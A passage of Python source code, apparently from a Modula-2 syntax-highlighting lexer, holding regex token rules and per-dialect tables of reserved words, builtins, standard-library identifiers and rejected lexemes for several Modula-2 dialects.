(r'\\+>', Operator), # M2R10 + ObjM2\n # Inequality Operator\n (r'<>', Operator), # ISO + PIM\n # Less-Or-Equal, Subset\n (r'<=', Operator),\n # Greater-Or-Equal, Superset\n (r'>=', Operator),\n # Identity Operator\n (r'==', Operator), # M2R10 + ObjM2\n # Type Conversion Operator\n (r'::', Operator), # M2R10 + ObjM2\n # Assignment Symbol\n (r':=', Operator),\n # Postfix Increment Mutator\n (r'\\+\\+', Operator), # M2R10 + ObjM2\n # Postfix Decrement Mutator\n (r'--', Operator), # M2R10 + ObjM2\n ],\n 'unigraph_operators': [\n # Arithmetic Operators\n (r'[+-]', Operator),\n (r'[*/]', Operator),\n # ISO 80000-2 compliant Set Difference Operator\n (r'\\\\', Operator), # M2R10 + ObjM2\n # Relational Operators\n (r'[=#<>]', Operator),\n # Dereferencing Operator\n (r'\\^', Operator),\n # Dereferencing Operator Synonym\n (r'@', Operator), # ISO\n # Logical AND Operator Synonym\n (r'&', Operator), # PIM + ISO\n # Logical NOT Operator Synonym\n (r'~', Operator), # PIM + ISO\n # Smalltalk Message Prefix\n (r'`', Operator), # ObjM2\n ],\n 'digraph_punctuation': [\n # Range Constructor\n (r'\\.\\.', Punctuation),\n # Opening Chevron Bracket\n (r'<<', Punctuation), # M2R10 + ISO\n # Closing Chevron Bracket\n (r'>>', Punctuation), # M2R10 + ISO\n # Blueprint Punctuation\n (r'->', Punctuation), # M2R10 + ISO\n # Distinguish |# and # in M2 R10\n (r'\\|#', Punctuation),\n # Distinguish ## and # in M2 R10\n (r'##', Punctuation),\n # Distinguish |* and * in M2 R10\n (r'\\|\\*', Punctuation),\n ],\n 'unigraph_punctuation': [\n # Common Punctuation\n (r'[()\\[\\]{},.:;|]', Punctuation),\n # Case Label Separator Synonym\n (r'!', Punctuation), # ISO\n # Blueprint Punctuation\n (r'\\?', Punctuation), # M2R10 + ObjM2\n ],\n 'comments': [\n # Single Line Comment\n (r'^//.*?\\n', Comment.Single), # M2R10 + ObjM2\n # Block Comment\n (r'\\(\\*([^$].*?)\\*\\)', Comment.Multiline),\n # Template Block Comment\n (r'/\\*(.*?)\\*/', Comment.Multiline), # M2R10 + ObjM2\n ],\n 'pragmas': [\n # ISO Style Pragmas\n (r'<\\*.*?\\*>', Comment.Preproc), # ISO, M2R10 + ObjM2\n # Pascal Style Pragmas\n (r'\\(\\*\\$.*?\\*\\)', Comment.Preproc), # PIM\n ],\n 'root': [\n include('whitespace'),\n include('dialecttags'),\n include('pragmas'),\n include('comments'),\n include('identifiers'),\n include('suffixed_number_literals'), # PIM + ISO\n include('prefixed_number_literals'), # M2R10 + ObjM2\n include('plain_number_literals'),\n include('string_literals'),\n include('digraph_punctuation'),\n include('digraph_operators'),\n include('unigraph_punctuation'),\n include('unigraph_operators'),\n ]\n }\n\n# C o m m o n D a t a s e t s\n\n # Common Reserved Words Dataset\n common_reserved_words = (\n # 37 common reserved words\n 'AND', 'ARRAY', 'BEGIN', 'BY', 'CASE', 'CONST', 'DEFINITION', 'DIV',\n 'DO', 'ELSE', 'ELSIF', 'END', 'EXIT', 'FOR', 'FROM', 'IF',\n 'IMPLEMENTATION', 'IMPORT', 'IN', 'LOOP', 'MOD', 'MODULE', 'NOT',\n 'OF', 'OR', 'POINTER', 'PROCEDURE', 'RECORD', 'REPEAT', 'RETURN',\n 'SET', 'THEN', 'TO', 'TYPE', 'UNTIL', 'VAR', 'WHILE',\n )\n\n # Common Builtins Dataset\n common_builtins = (\n # 16 common builtins\n 'ABS', 'BOOLEAN', 'CARDINAL', 'CHAR', 'CHR', 'FALSE', 'INTEGER',\n 'LONGINT', 'LONGREAL', 'MAX', 'MIN', 'NIL', 'ODD', 'ORD', 'REAL',\n 'TRUE',\n )\n\n # Common Pseudo-Module Builtins Dataset\n common_pseudo_builtins = (\n # 4 common pseudo builtins\n 'ADDRESS', 'BYTE', 'WORD', 'ADR'\n )\n\n# P I M M o d u l a - 2 D a t a s e t s\n\n # Lexemes to Mark as Error Tokens for PIM Modula-2\n pim_lexemes_to_reject = (\n '!', '`', 
'@', '$', '%', '?', '\\\\', '==', '++', '--', '::', '*.',\n '+>', '->', '<<', '>>', '|#', '##',\n )\n\n # PIM Modula-2 Additional Reserved Words Dataset\n pim_additional_reserved_words = (\n # 3 additional reserved words\n 'EXPORT', 'QUALIFIED', 'WITH',\n )\n\n # PIM Modula-2 Additional Builtins Dataset\n pim_additional_builtins = (\n # 16 additional builtins\n 'BITSET', 'CAP', 'DEC', 'DISPOSE', 'EXCL', 'FLOAT', 'HALT', 'HIGH',\n 'INC', 'INCL', 'NEW', 'NIL', 'PROC', 'SIZE', 'TRUNC', 'VAL',\n )\n\n # PIM Modula-2 Additional Pseudo-Module Builtins Dataset\n pim_additional_pseudo_builtins = (\n # 5 additional pseudo builtins\n 'SYSTEM', 'PROCESS', 'TSIZE', 'NEWPROCESS', 'TRANSFER',\n )\n\n# I S O M o d u l a - 2 D a t a s e t s\n\n # Lexemes to Mark as Error Tokens for ISO Modula-2\n iso_lexemes_to_reject = (\n '`', '$', '%', '?', '\\\\', '==', '++', '--', '::', '*.', '+>', '->',\n '<<', '>>', '|#', '##',\n )\n\n # ISO Modula-2 Additional Reserved Words Dataset\n iso_additional_reserved_words = (\n # 9 additional reserved words (ISO 10514-1)\n 'EXCEPT', 'EXPORT', 'FINALLY', 'FORWARD', 'PACKEDSET', 'QUALIFIED',\n 'REM', 'RETRY', 'WITH',\n # 10 additional reserved words (ISO 10514-2 & ISO 10514-3)\n 'ABSTRACT', 'AS', 'CLASS', 'GUARD', 'INHERIT', 'OVERRIDE', 'READONLY',\n 'REVEAL', 'TRACED', 'UNSAFEGUARDED',\n )\n\n # ISO Modula-2 Additional Builtins Dataset\n iso_additional_builtins = (\n # 26 additional builtins (ISO 10514-1)\n 'BITSET', 'CAP', 'CMPLX', 'COMPLEX', 'DEC', 'DISPOSE', 'EXCL', 'FLOAT',\n 'HALT', 'HIGH', 'IM', 'INC', 'INCL', 'INT', 'INTERRUPTIBLE', 'LENGTH',\n 'LFLOAT', 'LONGCOMPLEX', 'NEW', 'PROC', 'PROTECTION', 'RE', 'SIZE',\n 'TRUNC', 'UNINTERRUPTIBLE', 'VAL',\n # 5 additional builtins (ISO 10514-2 & ISO 10514-3)\n 'CREATE', 'DESTROY', 'EMPTY', 'ISMEMBER', 'SELF',\n )\n\n # ISO Modula-2 Additional Pseudo-Module Builtins Dataset\n iso_additional_pseudo_builtins = (\n # 14 additional builtins (SYSTEM)\n 'SYSTEM', 'BITSPERLOC', 'LOCSPERBYTE', 'LOCSPERWORD', 'LOC',\n 'ADDADR', 'SUBADR', 'DIFADR', 'MAKEADR', 'ADR',\n 'ROTATE', 'SHIFT', 'CAST', 'TSIZE',\n # 13 additional builtins (COROUTINES)\n 'COROUTINES', 'ATTACH', 'COROUTINE', 'CURRENT', 'DETACH', 'HANDLER',\n 'INTERRUPTSOURCE', 'IOTRANSFER', 'IsATTACHED', 'LISTEN',\n 'NEWCOROUTINE', 'PROT', 'TRANSFER',\n # 9 additional builtins (EXCEPTIONS)\n 'EXCEPTIONS', 'AllocateSource', 'CurrentNumber', 'ExceptionNumber',\n 'ExceptionSource', 'GetMessage', 'IsCurrentSource',\n 'IsExceptionalExecution', 'RAISE',\n # 3 additional builtins (TERMINATION)\n 'TERMINATION', 'IsTerminating', 'HasHalted',\n # 4 additional builtins (M2EXCEPTION)\n 'M2EXCEPTION', 'M2Exceptions', 'M2Exception', 'IsM2Exception',\n 'indexException', 'rangeException', 'caseSelectException',\n 'invalidLocation', 'functionException', 'wholeValueException',\n 'wholeDivException', 'realValueException', 'realDivException',\n 'complexValueException', 'complexDivException', 'protException',\n 'sysException', 'coException', 'exException',\n )\n\n# M o d u l a - 2 R 1 0 D a t a s e t s\n\n # Lexemes to Mark as Error Tokens for Modula-2 R10\n m2r10_lexemes_to_reject = (\n '!', '`', '@', '$', '%', '&', '<>',\n )\n\n # Modula-2 R10 reserved words in addition to the common set\n m2r10_additional_reserved_words = (\n # 12 additional reserved words\n 'ALIAS', 'ARGLIST', 'BLUEPRINT', 'COPY', 'GENLIB', 'INDETERMINATE',\n 'NEW', 'NONE', 'OPAQUE', 'REFERENTIAL', 'RELEASE', 'RETAIN',\n # 2 additional reserved words with symbolic assembly option\n 'ASM', 'REG',\n )\n\n # Modula-2 R10 builtins 
in addition to the common set\n m2r10_additional_builtins = (\n # 26 additional builtins\n 'CARDINAL', 'COUNT', 'EMPTY', 'EXISTS', 'INSERT', 'LENGTH', 'LONGCARD',\n 'OCTET', 'PTR', 'PRED', 'READ', 'READNEW', 'REMOVE', 'RETRIEVE', 'SORT',\n 'STORE', 'SUBSET', 'SUCC', 'TLIMIT', 'TMAX', 'TMIN', 'TRUE', 'TSIZE',\n 'UNICHAR', 'WRITE', 'WRITEF',\n )\n\n # Modula-2 R10 Additional Pseudo-Module Builtins Dataset\n m2r10_additional_pseudo_builtins = (\n # 13 additional builtins (TPROPERTIES)\n 'TPROPERTIES', 'PROPERTY', 'LITERAL', 'TPROPERTY', 'TLITERAL',\n 'TBUILTIN', 'TDYN', 'TREFC', 'TNIL', 'TBASE', 'TPRECISION',\n 'TMAXEXP', 'TMINEXP',\n # 4 additional builtins (CONVERSION)\n 'CONVERSION', 'TSXFSIZE', 'SXF', 'VAL',\n # 35 additional builtins (UNSAFE)\n 'UNSAFE', 'CAST', 'INTRINSIC', 'AVAIL', 'ADD', 'SUB', 'ADDC', 'SUBC',\n 'FETCHADD', 'FETCHSUB', 'SHL', 'SHR', 'ASHR', 'ROTL', 'ROTR', 'ROTLC',\n 'ROTRC', 'BWNOT', 'BWAND', 'BWOR', 'BWXOR', 'BWNAND', 'BWNOR',\n 'SETBIT', 'TESTBIT', 'LSBIT', 'MSBIT', 'CSBITS', 'BAIL', 'HALT',\n 'TODO', 'FFI', 'ADDR', 'VARGLIST', 'VARGC',\n # 11 additional builtins (ATOMIC)\n 'ATOMIC', 'INTRINSIC', 'AVAIL', 'SWAP', 'CAS', 'INC', 'DEC', 'BWAND',\n 'BWNAND', 'BWOR', 'BWXOR',\n # 7 additional builtins (COMPILER)\n 'COMPILER', 'DEBUG', 'MODNAME', 'PROCNAME', 'LINENUM', 'DEFAULT',\n 'HASH',\n # 5 additional builtins (ASSEMBLER)\n 'ASSEMBLER', 'REGISTER', 'SETREG', 'GETREG', 'CODE',\n )\n\n# O b j e c t i v e M o d u l a - 2 D a t a s e t s\n\n # Lexemes to Mark as Error Tokens for Objective Modula-2\n objm2_lexemes_to_reject = (\n '!', '$', '%', '&', '<>',\n )\n\n # Objective Modula-2 Extensions\n # reserved words in addition to Modula-2 R10\n objm2_additional_reserved_words = (\n # 16 additional reserved words\n 'BYCOPY', 'BYREF', 'CLASS', 'CONTINUE', 'CRITICAL', 'INOUT', 'METHOD',\n 'ON', 'OPTIONAL', 'OUT', 'PRIVATE', 'PROTECTED', 'PROTOCOL', 'PUBLIC',\n 'SUPER', 'TRY',\n )\n\n # Objective Modula-2 Extensions\n # builtins in addition to Modula-2 R10\n objm2_additional_builtins = (\n # 3 additional builtins\n 'OBJECT', 'NO', 'YES',\n )\n\n # Objective Modula-2 Extensions\n # pseudo-module builtins in addition to Modula-2 R10\n objm2_additional_pseudo_builtins = (\n # None\n )\n\n# A g l e t M o d u l a - 2 D a t a s e t s\n\n # Aglet Extensions\n # reserved words in addition to ISO Modula-2\n aglet_additional_reserved_words = (\n # None\n )\n\n # Aglet Extensions\n # builtins in addition to ISO Modula-2\n aglet_additional_builtins = (\n # 9 additional builtins\n 'BITSET8', 'BITSET16', 'BITSET32', 'CARDINAL8', 'CARDINAL16',\n 'CARDINAL32', 'INTEGER8', 'INTEGER16', 'INTEGER32',\n )\n\n # Aglet Modula-2 Extensions\n # pseudo-module builtins in addition to ISO Modula-2\n aglet_additional_pseudo_builtins = (\n # None\n )\n\n# G N U M o d u l a - 2 D a t a s e t s\n\n # GNU Extensions\n # reserved words in addition to PIM Modula-2\n gm2_additional_reserved_words = (\n # 10 additional reserved words\n 'ASM', '__ATTRIBUTE__', '__BUILTIN__', '__COLUMN__', '__DATE__',\n '__FILE__', '__FUNCTION__', '__LINE__', '__MODULE__', 'VOLATILE',\n )\n\n # GNU Extensions\n # builtins in addition to PIM Modula-2\n gm2_additional_builtins = (\n # 21 additional builtins\n 'BITSET8', 'BITSET16', 'BITSET32', 'CARDINAL8', 'CARDINAL16',\n 'CARDINAL32', 'CARDINAL64', 'COMPLEX32', 'COMPLEX64', 'COMPLEX96',\n 'COMPLEX128', 'INTEGER8', 'INTEGER16', 'INTEGER32', 'INTEGER64',\n 'REAL8', 'REAL16', 'REAL32', 'REAL96', 'REAL128', 'THROW',\n )\n\n # GNU Extensions\n # pseudo-module builtins in addition to PIM 
Modula-2\n gm2_additional_pseudo_builtins = (\n # None\n )\n\n# p 1 M o d u l a - 2 D a t a s e t s\n\n # p1 Extensions\n # reserved words in addition to ISO Modula-2\n p1_additional_reserved_words = (\n # None\n )\n\n # p1 Extensions\n # builtins in addition to ISO Modula-2\n p1_additional_builtins = (\n # None\n )\n\n # p1 Modula-2 Extensions\n # pseudo-module builtins in addition to ISO Modula-2\n p1_additional_pseudo_builtins = (\n # 1 additional builtin\n 'BCD',\n )\n\n# X D S M o d u l a - 2 D a t a s e t s\n\n # XDS Extensions\n # reserved words in addition to ISO Modula-2\n xds_additional_reserved_words = (\n # 1 additional reserved word\n 'SEQ',\n )\n\n # XDS Extensions\n # builtins in addition to ISO Modula-2\n xds_additional_builtins = (\n # 9 additional builtins\n 'ASH', 'ASSERT', 'DIFFADR_TYPE', 'ENTIER', 'INDEX', 'LEN',\n 'LONGCARD', 'SHORTCARD', 'SHORTINT',\n )\n\n # XDS Modula-2 Extensions\n # pseudo-module builtins in addition to ISO Modula-2\n xds_additional_pseudo_builtins = (\n # 21 additional builtins (SYSTEM)\n 'PROCESS', 'NEWPROCESS', 'BOOL8', 'BOOL16', 'BOOL32', 'CARD8',\n 'CARD16', 'CARD32', 'INT8', 'INT16', 'INT32', 'REF', 'MOVE',\n 'FILL', 'GET', 'PUT', 'CC', 'int', 'unsigned', 'size_t', 'void',\n # 3 additional builtins (COMPILER)\n 'COMPILER', 'OPTION', 'EQUATION',\n )\n\n# P I M S t a n d a r d L i b r a r y D a t a s e t s\n\n # PIM Modula-2 Standard Library Modules Dataset\n pim_stdlib_module_identifiers = (\n 'Terminal', 'FileSystem', 'InOut', 'RealInOut', 'MathLib0', 'Storage',\n )\n\n # PIM Modula-2 Standard Library Types Dataset\n pim_stdlib_type_identifiers = (\n 'Flag', 'FlagSet', 'Response', 'Command', 'Lock', 'Permission',\n 'MediumType', 'File', 'FileProc', 'DirectoryProc', 'FileCommand',\n 'DirectoryCommand',\n )\n\n # PIM Modula-2 Standard Library Procedures Dataset\n pim_stdlib_proc_identifiers = (\n 'Read', 'BusyRead', 'ReadAgain', 'Write', 'WriteString', 'WriteLn',\n 'Create', 'Lookup', 'Close', 'Delete', 'Rename', 'SetRead', 'SetWrite',\n 'SetModify', 'SetOpen', 'Doio', 'SetPos', 'GetPos', 'Length', 'Reset',\n 'Again', 'ReadWord', 'WriteWord', 'ReadChar', 'WriteChar',\n 'CreateMedium', 'DeleteMedium', 'AssignName', 'DeassignName',\n 'ReadMedium', 'LookupMedium', 'OpenInput', 'OpenOutput', 'CloseInput',\n 'CloseOutput', 'ReadString', 'ReadInt', 'ReadCard', 'ReadWrd',\n 'WriteInt', 'WriteCard', 'WriteOct', 'WriteHex', 'WriteWrd',\n 'ReadReal', 'WriteReal', 'WriteFixPt', 'WriteRealOct', 'sqrt', 'exp',\n 'ln', 'sin', 'cos', 'arctan', 'entier', 'ALLOCATE', 'DEALLOCATE',\n )\n\n # PIM Modula-2 Standard Library Variables Dataset\n pim_stdlib_var_identifiers = (\n 'Done', 'termCH', 'in', 'out'\n )\n\n # PIM Modula-2 Standard Library Constants Dataset\n pim_stdlib_const_identifiers = (\n 'EOL',\n )\n\n# I S O S t a n d a r d L i b r a r y D a t a s e t s\n\n # ISO Modula-2 Standard Library Modules Dataset\n iso_stdlib_module_identifiers = (\n # TO DO\n )\n\n # ISO Modula-2 Standard Library Types Dataset\n iso_stdlib_type_identifiers = (\n # TO DO\n )\n\n # ISO Modula-2 Standard Library Procedures Dataset\n iso_stdlib_proc_identifiers = (\n # TO DO\n )\n\n # ISO Modula-2 Standard Library Variables Dataset\n iso_stdlib_var_identifiers = (\n # TO DO\n )\n\n # ISO Modula-2 Standard Library Constants Dataset\n iso_stdlib_const_identifiers = (\n # TO DO\n )\n\n# M 2 R 1 0 S t a n d a r d L i b r a r y D a t a s e t s\n\n # Modula-2 R10 Standard Library ADTs Dataset\n m2r10_stdlib_adt_identifiers = (\n 'BCD', 'LONGBCD', 'BITSET', 'SHORTBITSET', 'LONGBITSET',\n 
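A Python pitfall worth noting for identifier tuples like the ones above: adjacent string literals concatenate implicitly, so a dropped comma silently merges two identifiers into a single entry that can never match. A minimal, self-contained illustration:

# Without the comma after 'void', two identifiers merge into one:
broken = ('size_t', 'void'
          'COMPILER', 'OPTION')
assert broken == ('size_t', 'voidCOMPILER', 'OPTION')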
'LONGLONGBITSET', 'COMPLEX', 'LONGCOMPLEX', 'SHORTCARD', 'LONGLONGCARD',\n 'SHORTINT', 'LONGLONGINT', 'POSINT', 'SHORTPOSINT', 'LONGPOSINT',\n 'LONGLONGPOSINT', 'BITSET8', 'BITSET16', 'BITSET32', 'BITSET64',\n 'BITSET128', 'BS8', 'BS16', 'BS32', 'BS64', 'BS128', 'CARDINAL8',\n 'CARDINAL16', 'CARDINAL32', 'CARDINAL64', 'CARDINAL128', 'CARD8',\n 'CARD16', 'CARD32', 'CARD64', 'CARD128', 'INTEGER8', 'INTEGER16',\n 'INTEGER32', 'INTEGER64', 'INTEGER128', 'INT8', 'INT16', 'INT32',\n 'INT64', 'INT128', 'STRING', 'UNISTRING',\n )\n\n # Modula-2 R10 Standard Library Blueprints Dataset\n m2r10_stdlib_blueprint_identifiers = (\n 'ProtoRoot', 'ProtoComputational', 'ProtoNumeric', 'ProtoScalar',\n 'ProtoNonScalar', 'ProtoCardinal', 'ProtoInteger', 'ProtoReal',\n 'ProtoComplex', 'ProtoVector', 'ProtoTuple', 'ProtoCompArray',\n 'ProtoCollection', 'ProtoStaticArray', 'ProtoStaticSet',\n 'ProtoStaticString', 'ProtoArray', 'ProtoString', 'ProtoSet',\n 'ProtoMultiSet', 'ProtoDictionary', 'ProtoMultiDict', 'ProtoExtension',\n 'ProtoIO', 'ProtoCardMath', 'ProtoIntMath', 'ProtoRealMath',\n )\n\n # Modula-2 R10 Standard Library Modules Dataset\n m2r10_stdlib_module_identifiers = (\n 'ASCII', 'BooleanIO', 'CharIO', 'UnicharIO', 'OctetIO',\n 'CardinalIO', 'LongCardIO', 'IntegerIO', 'LongIntIO', 'RealIO',\n 'LongRealIO', 'BCDIO', 'LongBCDIO', 'CardMath', 'LongCardMath',\n 'IntMath', 'LongIntMath', 'RealMath', 'LongRealMath', 'BCDMath',\n 'LongBCDMath', 'FileIO', 'FileSystem', 'Storage', 'IOSupport',\n )\n\n # Modula-2 R10 Standard Library Types Dataset\n m2r10_stdlib_type_identifiers = (\n 'File', 'Status',\n # TO BE COMPLETED\n )\n\n # Modula-2 R10 Standard Library Procedures Dataset\n m2r10_stdlib_proc_identifiers = (\n 'ALLOCATE', 'DEALLOCATE', 'SIZE',\n # TO BE COMPLETED\n )\n\n # Modula-2 R10 Standard Library Variables Dataset\n m2r10_stdlib_var_identifiers = (\n 'stdIn', 'stdOut', 'stdErr',\n )\n\n # Modula-2 R10 Standard Library Constants Dataset\n m2r10_stdlib_const_identifiers = (\n 'pi', 'tau',\n )\n\n# D i a l e c t s\n\n # Dialect modes\n dialects = (\n 'unknown',\n 'm2pim', 'm2iso', 'm2r10', 'objm2',\n 'm2iso+aglet', 'm2pim+gm2', 'm2iso+p1', 'm2iso+xds',\n )\n\n# D a t a b a s e s\n\n # Lexemes to Mark as Errors Database\n lexemes_to_reject_db = {\n # Lexemes to reject for unknown dialect\n 'unknown': (\n # LEAVE THIS EMPTY\n ),\n # Lexemes to reject for PIM Modula-2\n 'm2pim': (\n pim_lexemes_to_reject,\n ),\n # Lexemes to reject for ISO Modula-2\n 'm2iso': (\n iso_lexemes_to_reject,\n ),\n # Lexemes to reject for Modula-2 R10\n 'm2r10': (\n m2r10_lexemes_to_reject,\n ),\n # Lexemes to reject for Objective Modula-2\n 'objm2': (\n objm2_lexemes_to_reject,\n ),\n # Lexemes to reject for Aglet Modula-2\n 'm2iso+aglet': (\n iso_lexemes_to_reject,\n ),\n # Lexemes to reject for GNU Modula-2\n 'm2pim+gm2': (\n pim_lexemes_to_reject,\n ),\n # Lexemes to reject for p1 Modula-2\n 'm2iso+p1': (\n iso_lexemes_to_reject,\n ),\n # Lexemes to reject for XDS Modula-2\n 'm2iso+xds': (\n iso_lexemes_to_reject,\n ),\n }\n\n # Reserved Words Database\n reserved_words_db = {\n # Reserved words for unknown dialect\n 'unknown': (\n common_reserved_words,\n pim_additional_reserved_words,\n iso_additional_reserved_words,\n m2r10_additional_reserved_words,\n ),\n\n # Reserved words for PIM Modula-2\n 'm2pim': (\n common_reserved_words,\n pim_additional_reserved_words,\n ),\n\n # Reserved words for ISO Modula-2\n 'm2iso': (\n common_reserved_words,\n iso_additional_reserved_words,\n ),\n\n # Reserved words for Modula-2 R10\n 
'm2r10': (\n common_reserved_words,\n m2r10_additional_reserved_words,\n ),\n\n # Reserved words for Objective Modula-2\n 'objm2': (\n common_reserved_words,\n m2r10_additional_reserved_words,\n objm2_additional_reserved_words,\n ),\n\n # Reserved words for Aglet Modula-2 Extensions\n 'm2iso+aglet': (\n common_reserved_words,\n iso_additional_reserved_words,\n aglet_additional_reserved_words,\n ),\n\n # Reserved words for GNU Modula-2 Extensions\n 'm2pim+gm2': (\n common_reserved_words,\n pim_additional_reserved_words,\n gm2_additional_reserved_words,\n ),\n\n # Reserved words for p1 Modula-2 Extensions\n 'm2iso+p1': (\n common_reserved_words,\n iso_additional_reserved_words,\n p1_additional_reserved_words,\n ),\n\n # Reserved words for XDS Modula-2 Extensions\n 'm2iso+xds': (\n common_reserved_words,\n iso_additional_reserved_words,\n xds_additional_reserved_words,\n ),\n }\n\n # Builtins Database\n builtins_db = {\n # Builtins for unknown dialect\n 'unknown': (\n common_builtins,\n pim_additional_builtins,\n iso_additional_builtins,\n m2r10_additional_builtins,\n ),\n\n # Builtins for PIM Modula-2\n 'm2pim': (\n common_builtins,\n pim_additional_builtins,\n ),\n\n # Builtins for ISO Modula-2\n 'm2iso': (\n common_builtins,\n iso_additional_builtins,\n ),\n\n # Builtins for Modula-2 R10\n 'm2r10': (\n common_builtins,\n m2r10_additional_builtins,\n ),\n\n # Builtins for Objective Modula-2\n 'objm2': (\n common_builtins,\n m2r10_additional_builtins,\n objm2_additional_builtins,\n ),\n\n # Builtins for Aglet Modula-2 Extensions\n 'm2iso+aglet': (\n common_builtins,\n iso_additional_builtins,\n aglet_additional_builtins,\n ),\n\n # Builtins for GNU Modula-2 Extensions\n 'm2pim+gm2': (\n common_builtins,\n pim_additional_builtins,\n gm2_additional_builtins,\n ),\n\n # Builtins for p1 Modula-2 Extensions\n 'm2iso+p1': (\n common_builtins,\n iso_additional_builtins,\n p1_additional_builtins,\n ),\n\n # Builtins for XDS Modula-2 Extensions\n 'm2iso+xds': (\n common_builtins,\n iso_additional_builtins,\n xds_additional_builtins,\n ),\n }\n\n # Pseudo-Module Builtins Database\n pseudo_builtins_db = {\n # Builtins for unknown dialect\n 'unknown': (\n common_pseudo_builtins,\n pim_additional_pseudo_builtins,\n iso_additional_pseudo_builtins,\n m2r10_additional_pseudo_builtins,\n ),\n\n # Builtins for PIM Modula-2\n 'm2pim': (\n common_pseudo_builtins,\n pim_additional_pseudo_builtins,\n ),\n\n # Builtins for ISO Modula-2\n 'm2iso': (\n common_pseudo_builtins,\n iso_additional_pseudo_builtins,\n ),\n\n # Builtins for Modula-2 R10\n 'm2r10': (\n common_pseudo_builtins,\n m2r10_additional_pseudo_builtins,\n ),\n\n # Builtins for Objective Modula-2\n 'objm2': (\n common_pseudo_builtins,\n m2r10_additional_pseudo_builtins,\n objm2_additional_pseudo_builtins,\n ),\n\n # Builtins for Aglet Modula-2 Extensions\n 'm2iso+aglet': (\n common_pseudo_builtins,\n iso_additional_pseudo_builtins,\n aglet_additional_pseudo_builtins,\n ),\n\n # Builtins for GNU Modula-2 Extensions\n 'm2pim+gm2': (\n common_pseudo_builtins,\n pim_additional_pseudo_builtins,\n gm2_additional_pseudo_builtins,\n ),\n\n # Builtins for p1 Modula-2 Extensions\n 'm2iso+p1': (\n common_pseudo_builtins,\n iso_additional_pseudo_builtins,\n p1_additional_pseudo_builtins,\n ),\n\n # Builtins for XDS Modula-2 Extensions\n 'm2iso+xds': (\n common_pseudo_builtins,\n iso_additional_pseudo_builtins,\n xds_additional_pseudo_builtins,\n ),\n }\n\n # Standard Library ADTs Database\n stdlib_adts_db = {\n # Empty entry for unknown dialect\n 'unknown': (\n # 
LEAVE THIS EMPTY\n ),\n # Standard Library ADTs for PIM Modula-2\n 'm2pim': (\n # No first class library types\n ),\n\n # Standard Library ADTs for ISO Modula-2\n 'm2iso': (\n # No first class library types\n ),\n\n # Standard Library ADTs for Modula-2 R10\n 'm2r10': (\n m2r10_stdlib_adt_identifiers,\n ),\n\n # Standard Library ADTs for Objective Modula-2\n 'objm2': (\n m2r10_stdlib_adt_identifiers,\n ),\n\n # Standard Library ADTs for Aglet Modula-2\n 'm2iso+aglet': (\n # No first class library types\n ),\n\n # Standard Library ADTs for GNU Modula-2\n 'm2pim+gm2': (\n # No first class library types\n ),\n\n # Standard Library ADTs for p1 Modula-2\n 'm2iso+p1': (\n # No first class library types\n ),\n\n # Standard Library ADTs for XDS Modula-2\n 'm2iso+xds': (\n # No first class library types\n ),\n }\n\n # Standard Library Modules Database\n stdlib_modules_db = {\n # Empty entry for unknown dialect\n 'unknown': (\n # LEAVE THIS EMPTY\n ),\n # Standard Library Modules for PIM Modula-2\n 'm2pim': (\n pim_stdlib_module_identifiers,\n ),\n\n # Standard Library Modules for ISO Modula-2\n 'm2iso': (\n iso_stdlib_module_identifiers,\n ),\n\n # Standard Library Modules for Modula-2 R10\n 'm2r10': (\n m2r10_stdlib_blueprint_identifiers,\n m2r10_stdlib_module_identifiers,\n m2r10_stdlib_adt_identifiers,\n ),\n\n # Standard Library Modules for Objective Modula-2\n 'objm2': (\n m2r10_stdlib_blueprint_identifiers,\n m2r10_stdlib_module_identifiers,\n ),\n\n # Standard Library Modules for Aglet Modula-2\n 'm2iso+aglet': (\n iso_stdlib_module_identifiers,\n ),\n\n # Standard Library Modules for GNU Modula-2\n 'm2pim+gm2': (\n pim_stdlib_module_identifiers,\n ),\n\n # Standard Library Modules for p1 Modula-2\n 'm2iso+p1': (\n iso_stdlib_module_identifiers,\n ),\n\n # Standard Library Modules for XDS Modula-2\n 'm2iso+xds': (\n iso_stdlib_module_identifiers,\n ),\n }\n\n # Standard Library Types Database\n stdlib_types_db = {\n # Empty entry for unknown dialect\n 'unknown': (\n # LEAVE THIS EMPTY\n ),\n # Standard Library Types for PIM Modula-2\n 'm2pim': (\n pim_stdlib_type_identifiers,\n ),\n\n # Standard Library Types for ISO Modula-2\n 'm2iso': (\n iso_stdlib_type_identifiers,\n ),\n\n # Standard Library Types for Modula-2 R10\n 'm2r10': (\n m2r10_stdlib_type_identifiers,\n ),\n\n # Standard Library Types for Objective Modula-2\n 'objm2': (\n m2r10_stdlib_type_identifiers,\n ),\n\n # Standard Library Types for Aglet Modula-2\n 'm2iso+aglet': (\n iso_stdlib_type_identifiers,\n ),\n\n # Standard Library Types for GNU Modula-2\n 'm2pim+gm2': (\n pim_stdlib_type_identifiers,\n ),\n\n # Standard Library Types for p1 Modula-2\n 'm2iso+p1': (\n iso_stdlib_type_identifiers,\n ),\n\n # Standard Library Types for XDS Modula-2\n 'm2iso+xds': (\n iso_stdlib_type_identifiers,\n ),\n }\n\n # Standard Library Procedures Database\n stdlib_procedures_db = {\n # Empty entry for unknown dialect\n 'unknown': (\n # LEAVE THIS EMPTY\n ),\n # Standard Library Procedures for PIM Modula-2\n 'm2pim': (\n pim_stdlib_proc_identifiers,\n ),\n\n # Standard Library Procedures for ISO Modula-2\n 'm2iso': (\n iso_stdlib_proc_identifiers,\n ),\n\n # Standard Library Procedures for Modula-2 R10\n 'm2r10': (\n m2r10_stdlib_proc_identifiers,\n ),\n\n # Standard Library Procedures for Objective Modula-2\n 'objm2': (\n m2r10_stdlib_proc_identifiers,\n ),\n\n # Standard Library Procedures for Aglet Modula-2\n 'm2iso+aglet': (\n iso_stdlib_proc_identifiers,\n ),\n\n # Standard Library Procedures for GNU Modula-2\n 'm2pim+gm2': (\n 
